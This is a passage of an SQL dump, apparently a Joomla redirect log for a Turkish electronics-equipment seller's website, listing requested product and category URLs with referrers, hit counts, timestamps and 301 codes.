00:00:00',301),(11121,'http://3s-technologies.com.tr/tr/urunler/smd-düşük-hızlı/by,category_name',NULL,'','',380,0,'2017-11-11 11:32:23','0000-00-00 00:00:00',301),(11122,'http://3s-technologies.com.tr/tr/urunler/smd-düşük-hızlı/by,product_name/dirdesc',NULL,'','',355,0,'2017-11-11 11:32:28','0000-00-00 00:00:00',301),(11123,'http://3s-technologies.com.tr/tr/urunler/smd-düşük-hızlı/cs40-detail/askquestion?tmpl=component',NULL,'','',358,0,'2017-11-11 11:32:43','0000-00-00 00:00:00',301),(11124,'http://3s-technologies.com.tr/tr/urunler/smd-düşük-hızlı/le-40v-detail/askquestion?tmpl=component',NULL,'','',369,0,'2017-11-11 11:33:01','0000-00-00 00:00:00',301),(11125,'http://3s-technologies.com.tr/tr/urunler/smd-düşük-hızlı/ls60v-detail/askquestion?tmpl=component',NULL,'','',373,0,'2017-11-11 11:33:08','0000-00-00 00:00:00',301),(11126,'http://3s-technologies.com.tr/tr/urunler/smd-fırın',NULL,'','',398,0,'2017-11-11 11:33:18','0000-00-00 00:00:00',301),(11127,'http://3s-technologies.com.tr/tr/urunler/smd-fırın/by,`p`.product_sku',NULL,'','',360,0,'2017-11-11 11:33:26','0000-00-00 00:00:00',301),(11128,'http://3s-technologies.com.tr/tr/urunler/smd-fırın/by,`p`.product_sku/dirdesc',NULL,'','',353,0,'2017-11-11 11:33:32','0000-00-00 00:00:00',301),(11129,'http://3s-technologies.com.tr/tr/urunler/smd-fırın/by,category_name',NULL,'','',372,0,'2017-11-11 11:33:40','0000-00-00 00:00:00',301),(11130,'http://3s-technologies.com.tr/tr/urunler/smd-fırın/by,category_name/dirdesc',NULL,'','',362,0,'2017-11-11 11:33:48','0000-00-00 00:00:00',301),(11131,'http://3s-technologies.com.tr/tr/urunler/smd-fırın/by,mf_name',NULL,'','',369,0,'2017-11-11 11:33:53','0000-00-00 00:00:00',301),(11132,'http://3s-technologies.com.tr/tr/urunler/smd-fırın/by,mf_name/dirdesc',NULL,'','',347,0,'2017-11-11 11:34:00','0000-00-00 00:00:00',301),(11133,'http://3s-technologies.com.tr/tr/urunler/smd-fırın/by,ordering',NULL,'','',359,0,'2017-11-11 11:34:06','0000-00-00 00:00:00',301),(11134,'http://3s-technologies.com.tr/tr/urunler/smd-fırın/by,pc.ordering,product_name',NULL,'','',364,0,'2017-11-11 11:34:13','0000-00-00 00:00:00',301),(11135,'http://3s-technologies.com.tr/tr/urunler/smd-fırın/by,pc.ordering,product_name/dirdesc',NULL,'','',354,0,'2017-11-11 11:34:20','0000-00-00 00:00:00',301),(11136,'http://3s-technologies.com.tr/tr/urunler/smd-fırın/by,product_name',NULL,'','',371,0,'2017-11-11 11:34:26','0000-00-00 00:00:00',301),(11137,'http://3s-technologies.com.tr/tr/urunler/smd-fırın/by,product_name/dirdesc',NULL,'','',355,0,'2017-11-11 11:34:33','0000-00-00 00:00:00',301),(11138,'http://3s-technologies.com.tr/tr/urunler/smd-fırın/by,product_sku',NULL,'','',369,0,'2017-11-11 11:34:38','0000-00-00 00:00:00',301),(11139,'http://3s-technologies.com.tr/tr/urunler/smd-orta-hızlı/by,category_name',NULL,'','',380,0,'2017-11-11 11:34:44','0000-00-00 00:00:00',301),(11140,'http://3s-technologies.com.tr/tr/urunler/smd-orta-hızlı/by,category_name/dirdesc',NULL,'','',374,0,'2017-11-11 11:34:49','0000-00-00 00:00:00',301),(11141,'http://3s-technologies.com.tr/tr/urunler/smd-orta-hızlı/by,mf_name',NULL,'','',380,0,'2017-11-11 11:34:55','0000-00-00 00:00:00',301),(11142,'http://3s-technologies.com.tr/tr/urunler/smd-orta-hızlı/by,mf_name/dirdesc',NULL,'','',364,0,'2017-11-11 11:35:01','0000-00-00 00:00:00',301),(11143,'http://3s-technologies.com.tr/tr/urunler/smd-orta-hızlı/by,ordering',NULL,'','',357,0,'2017-11-11 11:35:09','0000-00-00 00:00:00',301),(11144,'http://3s-technologies.com.tr/tr/urunler/smd-orta-hızlı/by,pc.ordering,product_name',NULL,'','',358,0,'2017-11-11 11:35:14','0000-00-00 00:00:00',301),(11145,'http://3s-technologies.com.tr/tr/urunler/smd-orta-hızlı/by,pc.ordering,product_name/dirdesc',NULL,'','',350,0,'2017-11-11 11:35:20','0000-00-00 00:00:00',301),(11146,'http://3s-technologies.com.tr/tr/urunler/smd-orta-hızlı/by,product_name',NULL,'','',362,0,'2017-11-11 11:35:30','0000-00-00 00:00:00',301),(11147,'http://3s-technologies.com.tr/tr/urunler/smd-orta-hızlı/by,product_name/dirdesc',NULL,'','',348,0,'2017-11-11 11:35:35','0000-00-00 00:00:00',301),(11148,'http://3s-technologies.com.tr/tr/urunler/smd-orta-hızlı/by,product_sku',NULL,'','',369,0,'2017-11-11 11:35:42','0000-00-00 00:00:00',301),(11149,'http://3s-technologies.com.tr/tr/urunler/smd-orta-hızlı/dirdesc',NULL,'','',367,0,'2017-11-11 11:35:50','0000-00-00 00:00:00',301),(11150,'http://www.3s-technologies.com.tr/tr/dmb-elektronik.com/j3.2/index.php/component/users?view=registration',NULL,'http://www.3s-technologies.com.tr/tr/dmb-elektronik.com/j3.2/index.php/component/users?view=registration','',34,0,'2017-11-11 11:37:08','0000-00-00 00:00:00',301),(11151,'http://www.3s-technologies.com.tr/tr/anasayfa?format=feed&type=atom',NULL,'','',3,0,'2017-11-11 11:38:10','0000-00-00 00:00:00',301),(11152,'http://www.3s-technologies.com.tr/en/products/thru-hole/rl132-detail/askquestion?tmpl=component',NULL,'','',29,0,'2017-11-11 11:55:52','0000-00-00 00:00:00',301),(11153,'http://www.3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/tel-lehim/245-sn63pb37-0.8mm-detail/askquestion?tmpl=component',NULL,'','',25,0,'2017-11-11 12:00:30','0000-00-00 00:00:00',301),(11154,'http://www.3s-technologies.com.tr/tr/urunler/2-el-makineler/rh2-detail',NULL,'','',53,0,'2017-11-11 12:21:38','0000-00-00 00:00:00',301),(11155,'http://3s-technologies.com.tr/tr/using-joomla/extensions/templates/beez-2/home-page-beez-2/80-turkish-tr/turkish-content/84-kester-lehimleme-malzemeleri',NULL,'','',14,0,'2017-11-11 12:47:23','0000-00-00 00:00:00',301),(11156,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturer/ddm-novastar/smd-fırın/by,category_name/dirdesc?language=en-gb',NULL,'','',2,0,'2017-11-11 13:27:34','0000-00-00 00:00:00',301),(11157,'http://www.3s-technologies.com.tr/en/products/bölgesel-lehimleme/ess-310-detail/askquestion?tmpl=component',NULL,'','',371,0,'2017-11-11 13:38:32','0000-00-00 00:00:00',301),(11158,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/smd-dã¼åÿã¼k-hä±zlä±/le-40v-detail',NULL,'','',14,0,'2017-11-11 13:39:25','0000-00-00 00:00:00',301),(11159,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturer/mirae/smd-orta-hızlı/by,`p`.product_sku?language=en-gb',NULL,'','',2,0,'2017-11-11 13:43:22','0000-00-00 00:00:00',301),(11160,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/çubuk-lehim/by,category_name/dirdesc?language=tr-tr',NULL,'','',2,0,'2017-11-11 13:55:21','0000-00-00 00:00:00',301),(11161,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/ddm-novastar/smd-fırın/by,category_name?language=tr-tr',NULL,'','',2,0,'2017-11-11 14:05:08','0000-00-00 00:00:00',301),(11162,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/panasonic/smd-ultra-hız/by,product_name',NULL,'','',212,0,'2017-11-11 14:06:43','0000-00-00 00:00:00',301),(11163,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/images/stories/virtuemart/product/resized/jvk_250x250.jpg',NULL,'','',1,0,'2017-11-11 14:19:14','0000-00-00 00:00:00',301),(11164,'http://3s-technologies.com.tr/en/products/av132-detail?tmpl=component&print=1',NULL,'','',21,0,'2017-11-11 14:21:38','0000-00-00 00:00:00',301),(11165,'http://3s-technologies.com.tr/index.php/en/products/smd-düşük-hızlı/cs40-detail',NULL,'','',149,0,'2017-11-11 14:35:11','0000-00-00 00:00:00',301),(11166,'http://3s-technologies.com.tr/index.php/en/products/smd-düşük-hızlı/le-40v-detail',NULL,'','',153,0,'2017-11-11 15:10:37','0000-00-00 00:00:00',301),(11167,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/smd-orta-hızlı/mx200lp-detail',NULL,'','',4,0,'2017-11-11 15:16:57','0000-00-00 00:00:00',301),(11168,'http://3s-technologies.com.tr/en/products/lehimleme-malzemeleri/tel-lehim',NULL,'','',42,0,'2017-11-11 15:17:39','0000-00-00 00:00:00',301),(11169,'http://www.3s-technologies.com.tr/index.php/en/products/krem-lehim/by,product_name/dirdesc?language=en-gb',NULL,'','',23,0,'2017-11-11 15:30:51','0000-00-00 00:00:00',301),(11170,'http://3s-technologies.com.tr/tr/images/stories/virtuemart/category/resized/rhii_640x420_250x250.jpg',NULL,'','',1,0,'2017-11-11 15:33:57','0000-00-00 00:00:00',301),(11171,'http://www.3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/krem-lehim/by,`p`.product_sku?language=en-gb',NULL,'','',24,0,'2017-11-11 15:39:59','0000-00-00 00:00:00',301),(11172,'http://3s-technologies.com.tr/index.php/tr/ueruenler/lehimleme-malzemeleri/krem-lehim/by,mf_name?language=tr-tr',NULL,'','',7,0,'2017-11-11 15:41:41','0000-00-00 00:00:00',301),(11173,'http://3s-technologies.com.tr/index.php/tr/ueruenler/2.-el-makineler/rh6-detail',NULL,'','',7,0,'2017-11-11 15:53:17','0000-00-00 00:00:00',301),(11174,'http://3s-technologies.com.tr/tr/urunler/thru-hole/by,product_sku',NULL,'','',9,0,'2017-11-11 15:54:59','0000-00-00 00:00:00',301),(11175,'http://www.3s-technologies.com.tr/en/products/thru-hole/by,mf_name',NULL,'','',43,0,'2017-11-11 16:09:47','0000-00-00 00:00:00',301),(11176,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturer/mirae/smd-ultra-hız/by,`p`.product_sku/dirdesc?language=en-gb',NULL,'','',2,0,'2017-11-11 16:11:44','0000-00-00 00:00:00',301),(11177,'http://www.3s-technologies.com.tr/index.php/en/products/tel-lehim/by,category_name/dirdesc?language=en-gb',NULL,'','',24,0,'2017-11-11 16:28:14','0000-00-00 00:00:00',301),(11178,'http://3s-technologies.com.tr/en/products/smd-orta-hızlı/by,mf_name',NULL,'','',411,0,'2017-11-11 16:58:47','0000-00-00 00:00:00',301),(11179,'http://3s-technologies.com.tr/index.php/en/products/smd-fırın/by,product_name?language=en-gb',NULL,'','',6,0,'2017-11-11 17:14:37','0000-00-00 00:00:00',301),(11180,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturer/ddm-novastar/smd-fırın?language=en-gb',NULL,'','',2,0,'2017-11-11 17:17:51','0000-00-00 00:00:00',301),(11181,'http://3s-technologies.com.tr/index.php/en/products/av132-detail?tmpl=component&print=1',NULL,'','',8,0,'2017-11-11 17:27:18','0000-00-00 00:00:00',301),(11182,'http://3s-technologies.com.tr/index.php/en/products/screen-printer/by,mf_name/dirdesc?language=en-gb',NULL,'','',15,0,'2017-11-11 17:32:35','0000-00-00 00:00:00',301),(11183,'http://3s-technologies.com.tr/index.php/en/products/smd-fırın/dirdesc?language=en-gb',NULL,'','',2,0,'2017-11-11 17:35:26','0000-00-00 00:00:00',301),(11184,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/panasonic/smd-orta-hızlı/by,category_name',NULL,'','',204,0,'2017-11-11 17:38:29','0000-00-00 00:00:00',301),(11185,'http://3s-technologies.com.tr/tr/urunler/spr-20-41-detail?tmpl=component&print=1',NULL,'','',8,0,'2017-11-11 17:41:10','0000-00-00 00:00:00',301),(11186,'http://3s-technologies.com.tr/index.php/en/products/manufacturer/panasonic/screen-printer/dirdesc?language=en-gb',NULL,'','',21,0,'2017-11-11 17:43:42','0000-00-00 00:00:00',301),(11187,'http://www.3s-technologies.com.tr/index.php/en/products/temizleme-makineleri/trident-detail/askquestion?tmpl=component',NULL,'','',22,0,'2017-11-11 18:16:44','0000-00-00 00:00:00',301),(11188,'http://3s-technologies.com.tr/index.php/en/products/trident-detail?tmpl=component&print=1',NULL,'','',8,0,'2017-11-11 18:33:49','0000-00-00 00:00:00',301),(11189,'http://3s-technologies.com.tr/index.php/en/products/bölgesel-lehimleme/by,category_name/dirdesc?language=en-gb',NULL,'','',3,0,'2017-11-11 18:36:07','0000-00-00 00:00:00',301),(11190,'http://www.3s-technologies.com.tr/tr/urunler/dalga-lehim/results,1-5',NULL,'','',3,0,'2017-11-11 18:46:51','0000-00-00 00:00:00',301),(11191,'http://www.3s-technologies.com.tr/tr/urunler/temizleme-makineleri/stencil-washer-eco-detail',NULL,'','',44,0,'2017-11-11 18:49:08','0000-00-00 00:00:00',301),(11192,'http://www.3s-technologies.com.tr/en/products/screen-printer/spr-20-41-detail/askquestion?tmpl=component',NULL,'','',30,0,'2017-11-11 18:49:10','0000-00-00 00:00:00',301),(11193,'http://3s-technologies.com.tr/en/products/manufacturer/mirae/smd-orta-hızlı/by,product_name',NULL,'','',426,0,'2017-11-11 18:51:27','0000-00-00 00:00:00',301),(11194,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/tolo/screen-printer/by,product_name/dirdesc?language=tr-tr',NULL,'','',23,0,'2017-11-11 18:59:49','0000-00-00 00:00:00',301),(11195,'http://www.3s-technologies.com.tr/index.php/en/products/275-k100-1mm-detail?tmpl=component&print=1',NULL,'','',25,0,'2017-11-11 19:01:02','0000-00-00 00:00:00',301),(11196,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/tolo/dalga-lehim/dirdesc',NULL,'','',26,0,'2017-11-11 19:08:01','0000-00-00 00:00:00',301),(11197,'http://www.3s-technologies.com.tr/index.php/en/products/tel-lehim/by,mf_name?error=404&language=en-gb',NULL,'','',1,0,'2017-11-11 19:13:57','0000-00-00 00:00:00',301),(11198,'http://3s-technologies.com.tr/tr/welcome.html',NULL,'','',36,0,'2017-11-11 19:25:10','0000-00-00 00:00:00',301),(11199,'http://www.3s-technologies.com.tr/tr/urunler/dalga-lehim/by,product_sku',NULL,'','',38,0,'2017-11-11 19:30:13','0000-00-00 00:00:00',301),(11200,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/temizleme-makineleri/by,category_name?language=tr-tr',NULL,'','',26,0,'2017-11-11 19:39:24','0000-00-00 00:00:00',301),(11201,'http://3s-technologies.com.tr/tr/urunler/manufacturer/panasonic',NULL,'','',24,0,'2017-11-11 19:44:24','0000-00-00 00:00:00',301),(11202,'http://3s-technologies.com.tr/en/products/lehimleme-malzemeleri/krem-lehim/by,product_sku',NULL,'','',8,0,'2017-11-11 19:56:45','0000-00-00 00:00:00',301),(11203,'http://3s-technologies.com.tr/index.php/en/products/2.-el-makineler/avf-detail/askquestion?tmpl=component',NULL,'','',7,0,'2017-11-11 20:03:30','0000-00-00 00:00:00',301),(11204,'http://3s-technologies.com.tr/index.php/tr/ueruenler/krem-lehim/by,product_name?language=tr-tr',NULL,'','',21,0,'2017-11-11 20:30:57','0000-00-00 00:00:00',301),(11205,'http://www.3s-technologies.com.tr/tr/images/stories/virtuemart/product/resized/a_stencilwasher-eco_s_250x250.jpg',NULL,'','',1,0,'2017-11-11 20:31:58','0000-00-00 00:00:00',301),(11206,'http://www.3s-technologies.com.tr/tr/images/stories/virtuemart/product/resized/av132_250x250.jpg',NULL,'','',1,0,'2017-11-11 20:42:23','0000-00-00 00:00:00',301),(11207,'http://3s-technologies.com.tr/tr/images/stories/virtuemart/product/resized/spartan12s-400x268_250x250.jpg',NULL,'','',2,0,'2017-11-11 20:42:59','0000-00-00 00:00:00',301),(11208,'http://www.3s-technologies.com.tr/index.php/en/products/temizleme-makineleri/by,ordering?language=en-gb',NULL,'','',25,0,'2017-11-11 20:43:04','0000-00-00 00:00:00',301),(11209,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/images/stories/virtuemart/product/resized/spartan12s-400x268_250x250.jpg',NULL,'','',1,0,'2017-11-11 20:48:59','0000-00-00 00:00:00',301),(11210,'http://www.3s-technologies.com.tr/index.php/en/products/temizleme-makineleri/stencil-washer-eco-detail',NULL,'','',34,0,'2017-11-11 21:02:46','0000-00-00 00:00:00',301),(11211,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturer/mirae/smd-ultra-hız/by,category_name?language=en-gb',NULL,'','',2,0,'2017-11-11 21:11:16','0000-00-00 00:00:00',301),(11212,'http://3s-technologies.com.tr/index.php/en/products/krem-lehim/by,product_sku?language=en-gb',NULL,'','',8,0,'2017-11-11 21:19:54','0000-00-00 00:00:00',301),(11213,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/smd-orta-hızlı/by,mf_name?language=tr-tr',NULL,'','',2,0,'2017-11-11 21:37:18','0000-00-00 00:00:00',301),(11214,'http://www.3s-technologies.com.tr/tr/images/stories/virtuemart/product/resized/jvk_250x250.jpg',NULL,'','',3,0,'2017-11-11 22:02:48','0000-00-00 00:00:00',301),(11215,'http://3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/flux/by,`p`.product_sku/dirdesc?language=en-gb',NULL,'','',14,0,'2017-11-11 22:18:34','0000-00-00 00:00:00',301),(11216,'http://www.3s-technologies.com.tr/index.php/en/products/tel-lehim/245-sn63pb37-0.4mm-29-detail',NULL,'','',28,0,'2017-11-11 22:56:21','0000-00-00 00:00:00',301),(11217,'http://3s-technologies.com.tr/tr/parks-home',NULL,'','',36,0,'2017-11-11 23:06:13','0000-00-00 00:00:00',301),(11218,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/screen-printer/by,mf_name/dirdesc?language=tr-tr',NULL,'','',25,0,'2017-11-11 23:20:25','0000-00-00 00:00:00',301),(11219,'http://3s-technologies.com.tr/tr/urunler/konveyorler/by,mf_name',NULL,'','',19,0,'2017-11-11 23:22:26','0000-00-00 00:00:00',301),(11220,'http://www.3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/krem-lehim/krem-lehim-31-detail',NULL,'','',24,0,'2017-11-11 23:27:18','0000-00-00 00:00:00',301),(11221,'http://3s-technologies.com.tr/tr/github.com/joomla',NULL,'','',42,0,'2017-11-11 23:38:11','0000-00-00 00:00:00',301),(11222,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/mirae/smd-orta-hızlı/dirdesc?language=tr-tr',NULL,'','',2,0,'2017-11-11 23:40:39','0000-00-00 00:00:00',301),(11223,'http://3s-technologies.com.tr/index.php/tr/ueruenler/thru-hole/jv131-detail',NULL,'','',7,0,'2017-11-11 23:48:19','0000-00-00 00:00:00',301),(11224,'http://www.3s-technologies.com.tr/index.php/en/products/tel-lehim/by,product_name/dirdesc?language=en-gb',NULL,'','',25,0,'2017-11-11 23:48:38','0000-00-00 00:00:00',301),(11225,'http://www.3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/krem-lehim/by,ordering?language=en-gb',NULL,'','',24,0,'2017-11-11 23:49:24','0000-00-00 00:00:00',301),(11226,'http://www.3s-technologies.com.tr/tr/urunler/spr-20-detail?tmpl=component&print=1',NULL,'','',33,0,'2017-11-12 00:00:21','0000-00-00 00:00:00',301),(11227,'http://3s-technologies.com.tr/en/products/smd-ultra-hız/by,product_sku',NULL,'','',413,0,'2017-11-12 00:05:06','0000-00-00 00:00:00',301),(11228,'http://www.3s-technologies.com.tr/tr/urunler/asp-300-detail?tmpl=component&print=1',NULL,'','',26,0,'2017-11-12 00:15:26','0000-00-00 00:00:00',301),(11229,'http://3s-technologies.com.tr/index.php/en/products/manufacturer/tolo/smd-fırın/by,`p`.product_sku/dirdesc?language=en-gb',NULL,'','',2,0,'2017-11-12 00:30:36','0000-00-00 00:00:00',301),(11230,'http://www.3s-technologies.com.tr/tr/urunler/smd-ultra-hız/by,product_sku',NULL,'','',235,0,'2017-11-12 00:36:50','0000-00-00 00:00:00',301),(11231,'http://www.3s-technologies.com.tr/index.php/en/products/screen-printer/by,category_name?language=en-gb',NULL,'','',26,0,'2017-11-12 00:37:34','0000-00-00 00:00:00',301),(11232,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/tolo/dalga-lehim/by,`p`.product_sku?language=tr-tr',NULL,'','',24,0,'2017-11-12 00:39:48','0000-00-00 00:00:00',301),(11233,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/bölgesel-lehimleme/by,mf_name/dirdesc?language=tr-tr',NULL,'','',2,0,'2017-11-12 00:49:43','0000-00-00 00:00:00',301),(11234,'http://www.3s-technologies.com.tr/en/products/screen-printer/by,mf_name',NULL,'','',42,0,'2017-11-12 00:52:40','0000-00-00 00:00:00',301),(11235,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturer/ddm-novastar/dalga-lehim/dirdesc?language=en-gb',NULL,'','',26,0,'2017-11-12 00:55:14','0000-00-00 00:00:00',301),(11236,'http://www.3s-technologies.com.tr/tr/urunler/dalga-lehim/results,1-50',NULL,'','',3,0,'2017-11-12 01:05:05','0000-00-00 00:00:00',301),(11237,'http://3s-technologies.com.tr/index.php/en/products/screen-printer/sp-18p-l-detail/askquestion?tmpl=component',NULL,'','',7,0,'2017-11-12 01:10:40','0000-00-00 00:00:00',301),(11238,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/ddm-novastar/dalga-lehim/dirdesc?language=tr-tr',NULL,'','',23,0,'2017-11-12 01:13:48','0000-00-00 00:00:00',301),(11239,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/templates/beez5/home-page-beez5/80-turkish-tr/turkish-content/84-kester-lehimleme-malzemeleri',NULL,'','',27,0,'2017-11-12 01:15:09','0000-00-00 00:00:00',301),(11240,'http://www.3s-technologies.com.tr/tr/urunler/lehimleme-malzemeleri/tel-lehim/by,product_sku',NULL,'','',53,0,'2017-11-12 01:23:30','0000-00-00 00:00:00',301),(11241,'http://www.3s-technologies.com.tr/index.php/en/products/2.-el-makineler/rh2-detail/askquestion?tmpl=component',NULL,'','',24,0,'2017-11-12 01:58:59','0000-00-00 00:00:00',301),(11242,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/smd-fırın/by,product_name?language=tr-tr',NULL,'','',2,0,'2017-11-12 02:02:28','0000-00-00 00:00:00',301),(11243,'http://3s-technologies.com.tr/index.php/en/products/dalga-lehim/lfs-1-detail/askquestion?tmpl=component',NULL,'','',7,0,'2017-11-12 02:12:52','0000-00-00 00:00:00',301),(11244,'http://3s-technologies.com.tr/tr/urunler/manufacturer/ddm-novastar/dalga-lehim/by,product_sku',NULL,'','',8,0,'2017-11-12 02:14:30','0000-00-00 00:00:00',301),(11245,'http://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/tolo/screen-printer/by,category_name?language=tr-tr',NULL,'','',7,0,'2017-11-12 02:18:17','0000-00-00 00:00:00',301),(11246,'http://www.3s-technologies.com.tr/tr/urunler/ess-310-24-detail?tmpl=component&print=1',NULL,'','',33,0,'2017-11-12 02:19:34','0000-00-00 00:00:00',301),(11247,'http://www.3s-technologies.com.tr/index.php/en/products/thru-hole/by,mf_name?language=en-gb',NULL,'','',23,0,'2017-11-12 02:26:45','0000-00-00 00:00:00',301),(11248,'http://www.3s-technologies.com.tr/index.php/en/products/2.-el-makineler/jvk-detail/askquestion?tmpl=component',NULL,'','',24,0,'2017-11-12 02:29:47','0000-00-00 00:00:00',301),(11249,'http://3s-technologies.com.tr/index.php/tr/ueruenler/dalga-lehim/lfs-1-detail',NULL,'','',8,0,'2017-11-12 02:49:11','0000-00-00 00:00:00',301),(11250,'http://3s-technologies.com.tr/index.php/en/products/manufacturer/panasonic/smd-ultra-hız/by,product_name/dirdesc?language=en-gb',NULL,'','',2,0,'2017-11-12 02:50:15','0000-00-00 00:00:00',301),(11251,'http://www.3s-technologies.com.tr/tr/urunler/dalga-lehim/results,1-10',NULL,'','',3,0,'2017-11-12 02:56:48','0000-00-00 00:00:00',301),(11252,'http://3s-technologies.com.tr/index.php/en/products/tel-lehim/by,`p`.product_sku?error=404&language=en-gb',NULL,'','',1,0,'2017-11-12 02:58:29','0000-00-00 00:00:00',301),(11253,'http://3s-technologies.com.tr/index.php/en/products/manufacturer/ddm-novastar/screen-printer/by,ordering?language=en-gb',NULL,'','',8,0,'2017-11-12 03:02:09','0000-00-00 00:00:00',301),(11254,'http://3s-technologies.com.tr/en/products/smd-fırın/ly-8c-detail',NULL,'http://yandex.ru/clck/jsredir?from=yandex.ru%3Bsearch%3Bweb%3B%3B&text=&etext=1602.poH_9hcGjZaEefIL-mhwT1fP6jwte7t4DaPl1Iv-BbkYmn1NXSvifaaWj6BmDez-.c506269095478df44a8acf76b0ade5be96c0ecb0&uuid=&state=_BLhILn4SxNIvvL0W45KSic66uCIg23qh8iRG98qeIXmeppkgUc0YMIVJNtoWDTa6Ctl47TPu5I&data=UlNrNmk5WktYejR0eWJFYk1LdmtxZ1Jkd2ZfbzlTeXhIT1lxSFJYd0d6WGRMREFKNElzTEsyQnVpMzliaU12SlQ4N2dRZzdVQlkycWNqMmpkVTNuNjNWNWZIVmtYSzd0N042ek5SR2FhT012emZyMDlhbXhXSmtCZ2R4QlVBOV9pZEo5WkFSMk9fYVAtekltZFNjcy1WaTMxUWsxd0Z5WmNaZWdNVS1aSmdaUkdkUDNrVVRBUzR4b1VFMjliWmst&b64e=2&sign=924e0465c9d1ef5127e63d5c1d296752&keyno=0&cst=AiuY0DBWFJ7IXge4WdYJQYpgPUyh7uQlorcb0TudsfIYOjKfr3TdbNlkIhdRoZLDAcPYzenSCGSFoNRtMRva89fnvEWioaVr0Rm4vTCqlhefUvf4yWLERBRSRD3I_hH0j6TrWlhjT-3cDS69_KRipA&ref=orjY4mGPRjk5boDnW0uvlrrd71vZw9kp5uQozpMtKCVD1_VsiHUAn1gST6vH99891iZ8mFIbKhaa2qzcHq3Djs_yjjFhS8Zr48EaumPdqV8rxtgSpnUaAec70n68JrL5&l10n=ru&cts=1510453676229&mc=7.00815138503','',228,0,'2017-11-12 03:10:59','0000-00-00 00:00:00',301),(11255,'http://3s-technologies.com.tr/tr/urunler/lehimleme-malzemeleri/krem-lehim/krem-lehim-31-detail',NULL,'','',9,0,'2017-11-12 03:18:32','0000-00-00 00:00:00',301),(11256,'http://3s-technologies.com.tr/index.php/en/products/tel-lehim/by,`p`.product_sku?language=en-gb',NULL,'','',8,0,'2017-11-12 03:19:03','0000-00-00 00:00:00',301),(11257,'http://3s-technologies.com.tr/index.php/en/products/flux/by,`p`.product_sku?language=en-gb',NULL,'','',8,0,'2017-11-12 03:20:54','0000-00-00 00:00:00',301),(11258,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/bölgesel-lehimleme/ess-310-24-detail',NULL,'','',5,0,'2017-11-12 03:21:37','0000-00-00 00:00:00',301),(11259,'http://3s-technologies.com.tr/index.php/tr/ueruenler/flux/955lc-detail/askquestion?tmpl=component',NULL,'','',14,0,'2017-11-12 03:30:25','0000-00-00 00:00:00',301),(11260,'http://www.3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/tel-lehim/by,mf_name?error=404&language=en-gb',NULL,'','',1,0,'2017-11-12 03:36:08','0000-00-00 00:00:00',301),(11261,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturer/mirae',NULL,'','',34,0,'2017-11-12 03:36:25','0000-00-00 00:00:00',301),(11262,'http://3s-technologies.com.tr/tr/urunler/lehimleme-malzemeleri/by,category_name',NULL,'','',18,0,'2017-11-12 03:57:12','0000-00-00 00:00:00',301),(11263,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/tolo/dalga-lehim/results,1-10',NULL,'','',3,0,'2017-11-12 03:58:52','0000-00-00 00:00:00',301),(11264,'http://www.3s-technologies.com.tr/en/products/manufacturer/ddm-novastar/screen-printer/by,product_name',NULL,'','',40,0,'2017-11-12 04:03:28','0000-00-00 00:00:00',301),(11265,'http://www.3s-technologies.com.tr/en/products/manufacturer/aqueous',NULL,'','',42,0,'2017-11-12 04:17:05','0000-00-00 00:00:00',301),(11266,'http://www.3s-technologies.com.tr/tr/anasayfa/80-turkish-tr/turkish-content?format=feed&type=atom',NULL,'','',2,0,'2017-11-12 04:20:58','0000-00-00 00:00:00',301),(11267,'http://www.3s-technologies.com.tr/tr/urunler/2-el-makineler/avf-detail/askquestion?tmpl=component',NULL,'','',30,0,'2017-11-12 04:24:24','0000-00-00 00:00:00',301),(11268,'http://3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/tel-lehim/by,mf_name?error=404&language=en-gb',NULL,'','',3,0,'2017-11-12 04:30:37','0000-00-00 00:00:00',301),(11269,'http://www.3s-technologies.com.tr/tr/urunler/temizleme-makineleri/trident-detail/askquestion?tmpl=component',NULL,'','',24,0,'2017-11-12 04:33:55','0000-00-00 00:00:00',301),(11270,'http://3s-technologies.com.tr/index.php/en/products/manufacturer/mirae/smd-orta-hızlı/by,`p`.product_sku?language=en-gb',NULL,'','',2,0,'2017-11-12 04:35:07','0000-00-00 00:00:00',301),(11271,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/tolo/screen-printer/by,mf_name',NULL,'','',27,0,'2017-11-12 04:36:07','0000-00-00 00:00:00',301),(11272,'http://3s-technologies.com.tr/tr/urunler/temizleme-makineleri/by,product_name',NULL,'','',21,0,'2017-11-12 04:38:11','0000-00-00 00:00:00',301),(11273,'http://3s-technologies.com.tr/index.php/en/products/screen-printer/spr-20-41-42-detail/askquestion?tmpl=component',NULL,'','',7,0,'2017-11-12 04:44:29','0000-00-00 